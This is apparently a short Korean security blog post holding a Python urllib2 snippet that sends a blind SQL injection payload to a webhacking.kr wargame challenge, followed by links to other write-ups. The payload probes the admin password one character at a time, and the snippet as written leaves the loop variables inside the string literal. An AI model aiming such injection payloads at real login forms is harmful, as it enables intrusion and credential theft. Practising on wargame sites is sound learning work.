cdor1's lab
urllib2 request 본문
url = 'http://webhacking.kr/challenge/bonus/bonus-2/index.php'
data = "id=admin' and ascii(substr(pw,str(i),1))=str(j)#"
headers = {'Cookie': "PHPSESSID=%s " % ssid}
req = urllib2.Request(url, data, headers)
'Security > Web' 카테고리의 다른 글
Webhacking.kr 50번 (0) | 2017.04.05 |
---|---|
Webhacking.kr 21번 (0) | 2017.04.04 |
Webhacking.kr 25번 (0) | 2017.04.03 |
Webhacking.kr 18번 (0) | 2017.04.01 |
Webhacking.kr 9번 (0) | 2017.03.31 |
Comments